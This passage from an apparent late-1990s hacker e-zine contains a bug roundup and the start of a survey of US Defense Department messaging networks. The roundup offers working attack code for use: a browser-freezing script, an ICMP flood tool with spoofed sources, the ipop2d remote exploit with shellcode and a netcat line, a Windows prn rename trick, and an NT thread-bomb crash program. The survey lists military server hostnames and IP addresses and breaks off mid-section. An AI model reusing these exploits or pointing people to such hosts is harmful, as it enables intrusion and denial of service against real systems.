  3160.     if (mount (dir, dir, MS_DOXATTR|MS_DATA, (char *) fstype, &nx, sizeof (nx))
  3161.         != 0)
  3162.     {
  3163.         perror ("mount");
  3164.         return 1;
  3165.     }
  3166.  
  3167.     /* Record mount point in /etc/mtab. */
  3168.     mnt.mnt_fsname = malloc (strlen (host) + sizeof (":nsd@") + strlen (ports) + 1);
  3169.     sprintf (mnt.mnt_fsname, "%s:nsd@%s", host, ports);
  3170.     mnt.mnt_dir = dir;
  3171.     if (!(mtabf = setmntent (MTAB_FILE, "r+")))
  3172.     {
  3173.         perror ("setmntent");
  3174.         return 1;
  3175.     }
  3176.     if (addmntent (mtabf, &mnt) < 0)
  3177.     {
  3178.         perror ("addmntent");
  3179.         return 1;
  3180.     }
  3181.     if (endmntent (mtabf) < 0)
  3182.     {
  3183.         perror ("endmntent");
  3184.         return 1;
  3185.     }
  3186.  
  3187.     return 0;
  3188. }
  3189. ---
  3190.  
  3191. Microshaft are not having a good time (do they ever?).  Another bug in IE5
  3192. was discovered. Put the following code into your web page to freeze IE and
  3193. stop script kiddies viewing your web site
  3194. -----cut here-----
  3195. <SCRIPT>
  3196.  
  3197. var color = new Array;
  3198. color[1] = "black";
  3199. color[2] = "white";
  3200.  
  3201. for(x = 0; x <3; x++)
  3202. {
  3203.         document.bgColor = color[x]
  3204.         if(x == 2)
  3205.         {
  3206.                 x = 0;
  3207.         }               
  3208. }
  3209.  
  3210.  
  3211. </SCRIPT>
  3212. -----cut here-----
  3213.  
  3214. This will put the background colour in an infinite loop and freeze IE
  3215. ---
  3216.  
  3217. Linux kernel 2.2.x seems to get into an awful mess when it is sent a large
  3218. number of some types of ICMP packages. To exploit this bug, use this:
  3219.  
  3220. #include <stdio.h>
  3221. #include <stdlib.h>
  3222. #include <string.h>
  3223. #include <sys/types.h>
  3224. #include <sys/socket.h>
  3225. #include <netinet/in.h>
  3226. #include <netinet/ip.h>
  3227. #include <netinet/ip_icmp.h>
  3228. #include <arpa/inet.h>
  3229. #include <errno.h>
  3230. #include <unistd.h>
  3231. #include <netdb.h>
  3232.  
  3233. struct icmp_hdr
  3234. {
  3235.     struct iphdr iph;
  3236.     struct icmp icp;
  3237.     char text[1002];
  3238. } icmph;
  3239.  
  3240. int in_cksum(int *ptr, int nbytes)
  3241. {
  3242.     long sum;
  3243.     u_short oddbyte, answer;
  3244.     sum = 0;
  3245.     while (nbytes > 1)
  3246.     {
  3247.     sum += *ptr++;
  3248.     nbytes -= 2;
  3249.     }
  3250.     if (nbytes == 1)
  3251.     {
  3252.     oddbyte = 0;
  3253.     *((u_char *)&oddbyte) = *(u_char *)ptr;
  3254.     sum += oddbyte;
  3255.     }
  3256.     sum = (sum >> 16) + (sum & 0xffff);
  3257.     sum += (sum >> 16);
  3258.     answer = ~sum;
  3259.     return(answer);
  3260. }
  3261.  
  3262. struct sockaddr_in sock_open(char *address, int socket, int prt)
  3263. {
  3264.     struct hostent *host;
  3265.     if ((host = gethostbyname(address)) == NULL)
  3266.     {
  3267.         perror("Unable to get host name");
  3268.         exit(-1);
  3269.     }    
  3270.     struct sockaddr_in sin;
  3271.     bzero((char *)&sin, sizeof(sin));
  3272.     sin.sin_family = PF_INET;
  3273.     sin.sin_port = htons(prt);
  3274.     bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
  3275.     return(sin);
  3276. }
  3277.  
  3278. void main(int argc, char **argv)
  3279. {
  3280.     int sock, i, ctr, k;
  3281.     int on = 1;
  3282.     struct sockaddr_in addrs;
  3283.     if (argc < 3)
  3284.     {
  3285.         printf("Usage: %s <ip_addr> <port>\n", argv[0]);
  3286.         exit(-1);
  3287.     }
  3288.     for (i = 0; i < 1002; i++)
  3289.     {
  3290.         icmph.text[i] = random() % 255;
  3291.     }
  3292.     sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  3293.     if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
  3294.     {
  3295.         perror("Can't set IP_HDRINCL option on socket");
  3296.     }
  3297.     if (sock < 0)
  3298.     {
  3299.         exit(-1);
  3300.     }
  3301.     fflush(stdout);
  3302.     for (ctr = 0;ctr < 1001;ctr++)
  3303.     {
  3304.         ctr = ctr % 1000;
  3305.             addrs = sock_open(argv[1], sock, atoi(argv[2]));
  3306.         icmph.iph.version = 4;
  3307.         icmph.iph.ihl = 6;
  3308.         icmph.iph.tot_len = 1024;
  3309.         icmph.iph.id = htons(0x001);
  3310.         icmph.iph.ttl = 255;
  3311.         icmph.iph.protocol = IPPROTO_ICMP;
  3312.         icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
  3313.         ((random() % 255) * 65535) +
  3314.         ((random() % 255) * 255) +
  3315.         (random() % 255);
  3316.         icmph.iph.daddr = addrs.sin_addr.s_addr;
  3317.         icmph.iph.frag_off = htons(0);
  3318.         icmph.icp.icmp_type = random() % 14;
  3319.         icmph.icp.icmp_code = random() % 10;
  3320.         icmph.icp.icmp_cksum = 0;
  3321.         icmph.icp.icmp_id = 2650;
  3322.         icmph.icp.icmp_seq = random() % 255;
  3323.         icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
  3324.         if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
  3325.         {
  3326.             if (errno != ENOBUFS) printf("X");
  3327.         }
  3328.         if (ctr == 0) printf("b00m ");
  3329.         fflush(stdout);
  3330.     }
  3331.     close(sock);
  3332. }
  3333. ---
  3334.  
  3335. Another one of those rare jewls came out earlier this month: a remote root
  3336. exploit. This time in ipop2d.  use well:
  3337. ---- SDI-pop2.c ------------------
  3338. /*
  3339.  * Sekure SDI (Brazilian Information Security Team)
  3340.  * ipop2d remote exploit for linux (Jun, 02 1999)
  3341.  *
  3342.  * by c0nd0r <condor@sekure.org>
  3343.  *
  3344.  *  (read the instructions below)
  3345.  *
  3346.  *  Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
  3347.  *            falcon, vader, c_orb, marty(nordo!) and minha malinha!
  3348.  *          also to #uground (irc.brasnet.org) and #SDI (efnet),
  3349.  *            guys at el8.org, toxyn.org, pulhas.org
  3350.  *
  3351.  *  Sincere Apologizes: duke (for the mistake we made with the wu-expl),
  3352.  *                     your code rocks.
  3353.  *
  3354.  *  Usage:
  3355.  *
  3356.  *    SDI-pop2 <imap_server> <user> <pass> [offset]
  3357.  *
  3358.  *   where  imap_server = IMAP server at your box (or other place as well)
  3359.  *        user = any account at your box
  3360.  *        pass = the account's password
  3361.  *          offset = 0 is default -- increase if it's necessary.
  3362.  *
  3363.  *  Example: (netcat rocks)
  3364.  *
  3365.  *  (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
  3366.  *
  3367.  *  ----------------------------------------------------------------
  3368.  *  HOWTO-exploit:
  3369.  *
  3370.  *   In order to gain remote access as user nobody, you should set
  3371.  *   an IMAP server at your box (just edit the inetd.conf) or at
  3372.  *   any other machine which you have an account.
  3373.  *
  3374.  *   During the anonymous_login() function, the ipop2d will set the
  3375.  *   uid to user nobody, so you are not going to get a rootshell.
  3376.  *  ----------------------------------------------------------------
  3377.  *
  3378.  *  We do NOT take any responsability for the consequences of using
  3379.  *  this code -- you've been warned! don't be a script k1dd13!
  3380.  *
  3381.  */
  3382.  
  3383.  
  3384. #include <stdio.h>
  3385.  
  3386. /*
  3387.  *  (shellcode)
  3388.  *
  3389.  *       jmp   0x1f
  3390.  *       popl  %esi
  3391.  *       movl  %esi,0x8(%esi)
  3392.  *       xorl  %eax,%eax
  3393.  *       movb  %eax,0x7(%esi)
  3394.  *       movl  %eax,0xc(%esi)
  3395.  *       movb  $0xb,%al
  3396.  *       movl  %esi,%ebx
  3397.  *       leal  0x8(%esi),%ecx
  3398.  *       leal  0xc(%esi),%edx
  3399.  *       int   $0x80
  3400.  *       xorl  %ebx,%ebx
  3401.  *       movl  %ebx,%eax
  3402.  *       inc   %eax
  3403.  *       int   $0x80
  3404.  *       call  -0x24
  3405.  *       .string \"/bin/sh\"
  3406.  * grab your shellcode generator at www.sekure.org
  3407.  */
  3408.  
  3409. char c0d3[] =
  3410.         "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
  3411.         "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
  3412.         "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
  3413.         "\xff\xff/bin/sh";
  3414.  
  3415.  
  3416. main (int argc, char *argv[] ) {
  3417.  char buf[2500];
  3418.  int x,y=1000, offset=0;
  3419.  long addr;
  3420.  char host[255], user[255], pass[255];
  3421.  int bsize=986;
  3422.  
  3423.  if ( argc < 4) {
  3424.   printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
  3425.   printf ( "usage:
  3426. (SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
  3427.   exit (0);
  3428.  }
  3429.  
  3430.  snprintf ( host, sizeof(host), "%s", argv[1]);
  3431.  snprintf ( user, sizeof(user), "%s", argv[2]);
  3432.  snprintf ( pass, sizeof(pass), "%s", argv[3]);
  3433.  
  3434.  if ( argc > 4) offset = atoi ( argv[4]);
  3435.  /* gimme the ret + offset */
  3436.  addr = 0xbffff3c0 + offset;
  3437.  fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
  3438.  
  3439.  /* calculation of the return address position */
  3440.  bsize -= strlen ( host);
  3441.  
  3442.  for ( x = 0; x < bsize-strlen(c0d3); x++)
  3443.   buf[x] = 0x90;
  3444.  
  3445.  for ( y = 0; y < strlen(c0d3); x++, y++)
  3446.   buf[x] = c0d3[y];
  3447.  
  3448.  for (  ; x < 1012; x+=4) {
  3449.   buf[x  ] = addr & 0x000000ff;
  3450.   buf[x+1] = (addr & 0x0000ff00) >> 8;
  3451.   buf[x+2] = (addr & 0x00ff0000) >> 16;
  3452.   buf[x+3] = (addr & 0xff000000) >> 24;
  3453.  }
  3454.  
  3455.  sleep (1);
  3456.  printf ( "HELO %s:%s %s\r\n", host, user, pass);
  3457.  sleep (1);
  3458.  printf ( "FOLD %s\r\n", buf);
  3459.  
  3460. }
  3461. ----- EOF ---------------------
  3462. ---
  3463.  
  3464. More problems in windoze9x, nt and all other versions at the moment, comes in
  3465. the handling of files named prn.*  Because in old versions of DOS, this was
  3466. reserved as a way of accessing the printer, it will not let you create any
  3467. files named prn.*  This is o.k, becuase windows won't let you create a file
  3468. with that name in any aplication.  The problem, as usual with microshaft
  3469. products comes in the implementation of networking.  If you are able to
  3470. access a file on a remote computer you can rename it to prn, and it will be
  3471. unremoveable.
  3472.  
  3473. This will only work if you access the remote computer using //computer/drive/*
  3474. it will not work if you map a network drive to your computer.
  3475.  
  3476. This could be a nasty flaw if someone done something like this: (talking DOS
  3477. now) rename //computer/c/program files //computer/c/prn this would mean that
  3478. the owner of the computer could not access, rename or delete his program
  3479. files directory and would probably lose all the data in the directory.
  3480.  
  3481. The only solution so far for this problem seems to be by using postix (a unix
  3482. emulator for windows) to remove the file.  Unix to the rescue once again.
  3483. ---
  3484.  
  3485. A few weeks ago MIRC 5.6 was released.  This contains a serious vulnerability
  3486. in that if you mention a url in a window, mirc will automaticly tell your
  3487. browser to go to that page, oh no, more people with banners and this time you
  3488. can't stop it from opening up your web browser and telling it to access the
  3489. site.
  3490. ---
  3491.  
  3492. Any of you code kiddies out there want to crash and NT workstation? A nice
  3493. little vulnerability that runs a large number of threads can crash it, and
  3494. you won't be able to bring up the task manager.  Here is the code:
  3495.  
  3496. /*
  3497.  * frootcake.c
  3498.  * kiva@wookey.org
  3499.  *
  3500.  * this tests NT at coping with *really dodgy* code...
  3501.  * it totally brings my SMP box to being unusable (SP5)
  3502.  */
  3503.  
  3504. #include <windows.h>
  3505. #include <stdio.h>
  3506.  
  3507. void poobah();
  3508.  
  3509. DWORD WINAPI thread_func (LPVOID lpv)
  3510. {
  3511.     DWORD id;
  3512.     HANDLE h;
  3513.     BOOL success = 1;
  3514.  
  3515.     h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
  3516.  
  3517.     while (success){
  3518.         switch (GetThreadPriority (h)){
  3519.         case THREAD_PRIORITY_ABOVE_NORMAL:
  3520.             success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
  3521.             break;
  3522.         case THREAD_PRIORITY_BELOW_NORMAL:
  3523.             success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
  3524.             break;
  3525.         case THREAD_PRIORITY_HIGHEST:
  3526.             success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
  3527.             break;
  3528.         case THREAD_PRIORITY_IDLE:
  3529.             success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
  3530.             break;
  3531.         case THREAD_PRIORITY_LOWEST:
  3532.             success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
  3533.             break;
  3534.         case THREAD_PRIORITY_NORMAL:
  3535.             success = SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
  3536.             break;
  3537.         }
  3538.     }
  3539.  
  3540.     poobah();
  3541.     return 0;
  3542. }
  3543.  
  3544. void poobah()
  3545. {
  3546.     DWORD id;
  3547.     HANDLE h;
  3548.  
  3549.     h = CreateThread (NULL, 0, thread_func, (LPVOID)0, 0, &id);
  3550.     SetThreadPriority (h, THREAD_PRIORITY_TIME_CRITICAL);
  3551.  
  3552.     poobah();
  3553. }
  3554.  
  3555. int main ()
  3556. {
  3557.     printf ("frootcake - kiva@wookey.org\n");
  3558.     poobah();
  3559.     return 0;
  3560. }
  3561. ---
  3562.  
  3563. As you always know, i like to save the best 'til last.  Probably the most
  3564. serious hole found recently is a whole that affects 90% of windows servers on
  3565. the net, and allows you to execute code remotely.  This is a VERY serious
  3566. whole that can allow you to run any program you like, including netbus and
  3567. back orafice.  got to: http://www.eeye.com/database/advisories/ad06081999/
  3568. ad06081999-exploit.html for more info
  3569. ---
  3570. Thats all for now.  All these bugs aren't garrenteed to work, i haven't
  3571. varified most of them so don't come bitching when they don't
  3572.  
  3573.  
  3574. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  3575. -->]OO[:[ DoD - DMS/AUTODIN ]::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]::::
  3576. -->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]:::::::::::::
  3577.  
  3578.  
  3579. Government/Military Defense Telecommunications Systems.
  3580. [AUTODIN] [DMS] [DSN] [DAASC DDN] [CSP] June 1999
  3581. by hybrid [ http://hybrid.dtmf.org hybrid@dtmf.org ]
  3582. -------------------------------------------------------
  3583.  
  3584. HI. This is a small article designed to be an introduction to the AUTODIN,
  3585. DMS and surrounding DSN government networks. It is not intended as a
  3586. definitive guide, I have only listed a few of many networks, it is more
  3587. focused on the summerisations and definitions of these networks :) So why
  3588. write an article on this subject?, Well basically I personaly find the
  3589. networks featured in this article very interesting, in the sense that I'm
  3590. curious as to why and how there where implemented and/or integrated with the
  3591. networks that exist today. I am in no way interested in gaining access to any
  3592. of these networks, All I have done here is done a little research through the
  3593. means of http, and news articles.
  3594.  
  3595. About this article..
  3596.  
  3597. In respect of the information sources of this article, any parts I have
  3598. copied, or used as an example are enclosed in speech marks (") or begun and
  3599. ended within a --- line. ALL of the information in this article has been
  3600. obtained from public domain resources, to find out more about the systems
  3601. and networks covered in this brief article, see the http links at the end of
  3602. the file. Thanks for reading this, hope you enjoy the article..
  3603.  
  3604. A U T O D I N
  3605. *************
  3606. DoD Automatic Digital Network (AUTODIN)
  3607.  
  3608. The AUTODIN digital network is a worldwide data communications network of the
  3609. Defense Communications System, and the US Department of Defense. It is
  3610. currently being upgraded and phased out by newer networks such as the DSN
  3611. (Defence Switched Network) and the Inter-Service/Agency Automated Message
  3612. Proccessing Exchange (I-S/A AMPE). This article will begin by focusing in on
  3613. the AUTODIN network, then progress to describe and summerise the more
  3614. contempory networks such as AMPE and the DSN. Currently the entire AUTODIN
  3615. network is being replaced mainly by the Defence Messaging System (DMS), again
  3616. I will discuss these networks in more detail after we've taken a look at
  3617. AUTODIN as you will provide better understanding of the newer networks.
  3618.  
  3619. The AUTODIN network is operated and maintained by the Defense Information
  3620. System Agency (DISA). The network is colosal in size and spans the globe,
  3621. and is intended for secret computer-controlled communications for the DoD,
  3622. and other Federal linked organisations and entitys. The whole system works on
  3623. a multi-level security platform, and operates using digital store and message
  3624. forwarding switching technolgys. Other majour government and military entitys
  3625. that use the AUTODIN network include the NSA (National Security Agency), the
  3626. DIA (Defense Intelligence Agency), and other well known organisations such as
  3627. NATO. Obviously the bodies that use the AUTODIN network for secure
  3628. communications can be very secretive, so the entire network was designed to
  3629. be extreamly secure with its user access levels. An external penetration of
  3630. this network would prove to be extreamly damaging to the the privacy of the
  3631. concerned government entitys, so it has been quite difficult to obtain raw
  3632. technical specifications of this network. 
  3633.  
  3634.    "National security could be affected if classified messages are not
  3635.    delivered on secure lines in a timely manner." 
  3636.  
  3637. The AUTODIN network can be accessed many ways, but primarily via the use of
  3638. a terminal called 'GateGuard'. GateGaurd operates on a desktop or laptop
  3639. computer, and is usually installed on AUTODIN subscriber premises. Origionaly
  3640. the AUTODIN network had to have human couriers to carry messages between
  3641. organisations by hand, now the GateGuard software does all that. The system
  3642. is designed to be an electronic gateway between the AUTODIN network and the
  3643. local phone office automation system (OAS). The idea is that no sensitive
  3644. messages or data can be lost during there travels through the OAS center. At
  3645. the moment, the gateway software is being used by many AUTODIN linked entitys
  3646. such as the Navy, the Army, Air Force Marine Corps, FAA, The Coast Guard, and
  3647. the DNA. The software is very versatile, but at the same time extreamly
  3648. secure. It enables users of the network to load the software onto there own
  3649. terminals, or laptops and then connect there STU III's (via the PSTN)
  3650. directly to the AUTODIN interface, essentialy forming a portable AUTODIN
  3651. terminal. The portable terminals can be linked to the AUTODIN network via
  3652. standard phone lines, cellualr lines, or via IMMARSAT (A Satelite network).
  3653. If you are like me you are probably thinking 'hey, this cant be secure..'
  3654. wrong: It appears that this kind of link is very secure, do you really think
  3655. the DoD would use non-secure phone lines as direct links to AUTODIN?.. To
  3656. get around this security flaw, the AUTODIN terminal system is operated by a
  3657. TCC telecommunications center, and links to and from the TCC implement
  3658. strong encryption techniqes such as KG Key Generators.
  3659.  
  3660. Of course, all phone/data networks need switches and routers, so the AUTODIN
  3661. network is controled and routed by a system called ASC (The AUTODIN Switching
  3662. Center). The system is one of the primary elements in the Defense
  3663. Communications System, and operates over high-speed secured data links
  3664. spanning the globe. The ASC system handles a large amount of classified data,
  3665. (4 million messages a month). The switching system consists of 14 trunks and
  3666. 75 circuits and is connected to Defense communications centers accross the
  3667. world, the system also implements DCS HF radio to mobile forces on the
  3668. ground. The system also handles data traffic for highly classified aircraft
  3669. missions for the 1st and 99th airlift sqaudrons. The switching/routing system
  3670. was designed so well it bareley suffers any downtime, and would obviously be
  3671. extreamly secure.
  3672.  
  3673. The AUTODIN network was origionaly a backbone and stand-alone system,
  3674. serving as a primary network for secret data transmission. In June 1998, a
  3675. communications company managed to develop a system that would enable the
  3676. AUTODIN network to be connected to the SIPRNET Defense network. Because
  3677. SIPRNET is based upon the IP protocol, it was incompatable with the AUTODIN
  3678. protocols which operate over point-to-point leased lines. The new routing
  3679. system (by Sm@rtRouters) enables the two networks to operate similtaniously
  3680. integrating each others protocols (IP + leased lines). The system works by
  3681. integrating MDTs and AISs (Automated Information Systems) onto the SIPRNET
  3682. network.  When an MDT/AIS sends a message, the locally connected router
  3683. translates the AUTODIN data stream into IP packets and sends them out on the
  3684. SIPRNET network. Then on the SIPRNET another router receives the IP packets,
  3685. translates them back into the AUTODIN format, and then passes the message to
  3686. its MDT or AIS. The sending and receiving MDTs and AISs are unaware that they
  3687. are communicating via the SIPRNET, therefore the whole system works just as
  3688. the older AUTODIN network did, but with the use of IP networks. The routing
  3689. works a little like ss#7 telephoney, whereas signals are looked up in
  3690. translation tables, and sorted in order of importance, or as the DoD would
  3691. say ('order of precedence').
  3692.  
  3693. The DMS System (Defense Messaging System) is one of the newest developments
  3694. designed to take place of the AUTODIN network. The new DMS network will be
  3695. fully implemented in august 1999, and as before will operate on highly
  3696. calssified information transmission links. The idea is to make the entire
  3697. DoD communications network fully automated, without the use of man-power in
  3698. the maintanance of network nodes etc. Again, the network is controled by the
  3699. DSA, and opertates on a message-to-reader protocol, I guess this eliminates
  3700. the securty flaws of similtanious message formats. The entire system is
  3701. proposed to be fully operational by the year 2OOO, and be fully accessable by
  3702. DoD members.
  3703.   
  3704.     "DMS is a network-centric application that rides on the Defense
  3705.      Information Systems Network." 
  3706.    
  3707. The Defense Automatic Addressing System Center DDN..
  3708. Where non-AUTODIN communication is concerned, the DAASC system has been
  3709. implemented. The system covers other government networks such as DISN, SNA,
  3710. DECNET etc. The system operates over the DAASC DDN file format protocol,
  3711. and is designed for the exchange of data with accountablity and tracability.
  3712. To get access to the DDN, the subscribers are expected to submit a 'DAASC
  3713. DDN' questionare, which will then be passed though various channels until it
  3714. can be verified and approved for connection to the DDN network. Once the
  3715. applicant has been approved for connection to the network, they are given a
  3716. login and password, which is used to various file transfer protocols such as
  3717. FTP on the DDN servers. The applicant will first be made to login to one of
  3718. the servers at Dayton/Tracy on a test basis, there account will subseqentialy
  3719. be activated for future use. The DAASC DDN network servers are as follows,
  3720.  
  3721. -------------------->
  3722. The DAASC DDN circuits at DAASC Dayton, Ohio and DAASC Tracy, California
  3723.                                       
  3724.    dayf1b.daas.dla.mil  198.97.76.200   * The DAASC system can be accessed
  3725.    dayf2b.daas.dla.mil  198.97.76.201   * via many ways, icluding dialup,
  3726.    dayf1.daas.dla.mil   192.67.251.15   * FTP etc. I do have the actual 
  3727.    dayf2.daas.dla.mil   192.67.251.16   * login procedures for each node, 
  3728.                                         * which I obtained from [public] 
  3729.    trafe1.daas.dla.mil  198.97.75.15    * HTTP, I feel it is un-nesasery to
  3730.    trafe2.daas.dla.mil  198.97.75.16    * provide such details, as I am not
  3731.    trafe1b.daas.dla.mil 198.97.74.15    * encouraging such access to these
  3732.    trafe2b.daas.dla.mil 198.97.74.16    * networks and servers. 
  3733. <--------------------
  3734.  
  3735. The DAASC network will terminate connectivity to the AUTODIN network at the
  3736. end of this year (1999). The DAASC system operates on many different software
  3737. and mechanisms. For example, a system called DAMES is designed to be run on
  3738. a DAASC network subscibers pc, and like conventional pstn communication, is
  3739. designed to implement phone lines as a means of transporting information with
  3740. the use of a standard modem.
  3741.                                       
  3742. ------------------------->
  3743.    " DAMES: DAAS Automated Message Exchange System. A connection between
  3744.      user PC and DAAS via switched dial-up modem or via network (ftp)
  3745.      connection. PC Software is furnished free of charge to United States
  3746.      Government Activities and authorized Defense Contractors. "
  3747.                                     
  3748.    " DIELOG: DAAS Integrated E-Mail Logistics System. Allows users to
  3749.      transmit and receive data via their electronic mail system. "
  3750.                                      
  3751.    " DDN: Defense Data Network. DAASC developed a capability, and
  3752.      associated messaging format to support the exchange of JANAP-128 and
  3753.      user defined variable length message data across the DDN/DISN using
  3754.      the File Transfer Protocol (FTP). This capability has been in place
  3755.      since mid 1993. The DDN file format is the preferred method of the
  3756.      exchange of data between the DAASC, and our over 177,000 customers. "
  3757.                                       
  3758.    " DARS: DAAS AUTODIN Replacement System. A suite of programs that were
  3759.      developed to allow DAASC customers to transmit and receive data
  3760.      pattern messages via their UNIX based systems. The software will
  3761.      manage and control the transmission of data pattern traffic via
  3762.      Defense Information Systems Network (DISN) utilizing the functions of
  3763.      FTP. "
  3764. <-------------------------
  3765.  
  3766. Communications Support Processor (CSP)
  3767.  
  3768. The CSP is a message processing system that is designed to provide trusted
  3769. handeling of data traffic, it runs on a multi-level secure MLS mode operation
  3770. basis, for tactical communications. The CSP handles message switching and
  3771. security checks for communication throught the AUTODIN and surrounding
  3772. networks/systems. During the metamorph from AUTODIN to DMS, the CSP system
  3773. will run alongside and be integrated with TCP/IP encryption techniqes,
  3774. eventually the CSPs will be connected to satelite communication nodes, and
  3775. therefore eliminate the DoD's dependancy on the older AUTODIN network. The
  3776. CSP system will be used for secure writer-to-reader transmissions, using
  3777. protocols such as X.400/X.500 messaging formats. The CSP has been designed to
  3778. be able to convert DMS X.400 messages to the older AUTODIN format, and vice
  3779. versa, the TCP/IP encryption will be used to allow messages to be passed
  3780. though the JWICS WAN or SPECAT over the SIPRNET network, ensuring 'bullet-
  3781. proof' communication transmission. SMART (Secure Messaging and Routing
  3782. Terminal, is used to segregate less-sensitive information from the more
  3783. classified data, the SMART system is capable of delivering AUTODIN messages
  3784. to email users who are located either on the JWICS, SIPRNET or NIPRNET
  3785. communications networks. A 'secure' email techniqe has been developed for
  3786. this network that allows users on a secure LAN to send and recieve AUTODIN
  3787. messages via a Netscape browser, obviously Microshaft browsers where
  3788. incapable of supplying addiquit security for the DSN ;) The software is
  3789. called SMART:SecureMail, and is said to be capable of strict privacy and
  3790. authentification. Because of this network can contain very sensitive data,
  3791. the following security measures have been tested and implemented on the CSP..
  3792.       
  3793. -------------------->
  3794.      Software Security Provisions
  3795.     
  3796.      * TCP/IP Selectable Triple DES Encryption
  3797.      * User authentication and verification with automatic password aging
  3798.      * Advanced user permission schemes
  3799.      * Security audit trail storage and retrieval
  3800.      * Message level CRC on input and output
  3801.      * Color coded security labels on all windows
  3802.      * Link level and message level protocol handshaking
  3803.      * Message security validation to input/output
  3804.      * Redundant message file storage
  3805.      * Send Authentication and Validation
  3806.      * Operating System monitored and protected against unauthorized
  3807.        intrusions.
  3808.        
  3809.      Security/Accreditation/Certifications
  3810.     
  3811.      * DIA accredited for consolidated R/Y communications with AUTODIN
  3812.      * Certified DoDIIS Core/Key Product
  3813.      * DISA Category I/III Certification
  3814.      * Meets AMPE security requirements of DIA Cir 5030.58-M
  3815.      * Accredited for MLS Mode of Operation (DCID 1/16 compliant)
  3816. <-----------------------       
  3817.  
  3818. More on the Defense Messaging System (DMS)
  3819.  
  3820. The Defense Message System (DMS) is a DoD system designed to replace the
  3821. AUTODIN network, previously discussed in this article. The DMS Program was
  3822. established by the Under Secretary of Defense for Acquisition in order to
  3823. "facilitate and coordinate development of an integrated, common-user message
  3824. system" for organizational and individual users. The main concept of the DMS
  3825. system as said before is to reduce DoD costs on the demanding AUTODIN
  3826. networks, ie: the newer DMS network is more or less fully automated, the DMS
  3827. preogram is operated and maintained by the DISA (www.disa.mil). The older
  3828. less-advanced AUTODIN system has served as a secret communications network
  3829. for the DoD and surrounding orgainisations for over 30 years, and is said to
  3830. be at times very slow, and limited to textual data, it used to operate on
  3831. a 2.4 Kbps connection. The new DMS system is capable of both textual and
  3832. graphical messages with also multi-media attachments. The DMS service is
  3833. designed to provide 3 main services to it's subscribers.. Messaging,
  3834. Information Security, and Directory services.
  3835.  
  3836. ----->
  3837. DMS Messaging Services
  3838. are built around an X.400 Message Transfer System (MTS), a collection of all
  3839. the system components which store and forward messages to the user at their
  3840. desktop computer. DMS compliant software, and in some cases hardware, are
  3841. required to access DMS messaging services.
  3842.  
  3843. DMS Information Security (INFOSEC) Services
  3844. use the National Security Agency's (NSA) Multi-level Information Systems
  3845. Security Initiative (MISSI) products to provide information security
  3846. services. Guards and firewalls provide security and a certain degree of
  3847. interoperability between different user communities. FORTEZZA cards, about
  3848. the size of inch thick credit card, provide encryption and digital signature
  3849. services at the desktop. Current DoD plans that each user be issued a
  3850. FORTEZZA card; however, this requirement may be relaxed in the near future so
  3851. that only organizational releasers need FORTEZZA cards. The FORTEZZA card is
  3852. inserted into the PCMCIA slot on a DMS compliant workstation.
  3853.  
  3854. DMS X.500 Directory Services
  3855. include a distributed global database that contains addressing and security
  3856. information about all DMS users. The Directory Services ensure messages sent
  3857. to organizations, collective addressees (CAD's) or individuals are properly
  3858. addressed. DMS compliant workstations, such as the CGSW-III, facilitate
  3859. access to DMS directory services.
  3860. <-----
  3861.  
  3862. The DMS system is designed to share telecommunications circuits with other
  3863. networks, unlike the previous AUTODIN network that used dedicated trunks.
  3864. Like all networks, the DMS has its own layer of physical and meta-physical
  3865. layers, in the case of DMS we see a hardaware layer and configuration,
  3866. software, and like other networks the DMS has it's own set of procedures and
  3867. standards. The DMS system can handle secure messaging via the X.400 message
  3868. protocol, ie: messaging--distribution--proccessing, the term for the DMS
  3869. messaging system is (Message Handeling System) or MHS. All these networks
  3870. are supposed to be very secure, I doubt the DoD would use them ubless they
  3871. undergo extream levels of security testing, the data that travels the DMS is
  3872. very sensitive so the DoD and other departments would not want a security
  3873. leak on there hands, therefore the DMS network has integrated security
  3874. features to ensure the privacy an protection of classified data. Some of
  3875. these security procedures and implementations are as follows..
  3876.  
  3877. --->
  3878. FORTEZZA Cards
  3879. **************       
  3880. The FORTEZZA PCMCIA card provides four essential security services: data
  3881. confidentiality (privacy of information), data integrity (assures message is
  3882. unaltered), user non-repudiation (undeniable proof that the information was
  3883. sent by the sender), and user authentication (proof that the individual users
  3884. and hardware components are who or what they are supposed to be). The cards
  3885. use Type II encryption/decryption, data hashing, and digital (electronic)
  3886. signatures. Type II algorithms are those algorithms that have been approved
  3887. by the National Security Agency (NSA) for the protection of Sensitive But
  3888. Unclassified (SBU) information. NSA has approved the use of the Fortezza card
  3889. for Secret-high messages for an interim period. This policy is known as
  3890. "Fortezza for Classified" (FFC). In addition to these Type II algorithms,
  3891. FORTEZZA cards contains user certificates. Each certificate contains the name
  3892. of the issuer (the certification authority), expiration date, user name,
  3893. public key information, clearance level (e.g., Top Secret (TS), Secret (S),
  3894. Sensitive But Unclassified (SBU)) and privileges (e.g., message releaser).
  3895.    
  3896. Guards
  3897. ******       
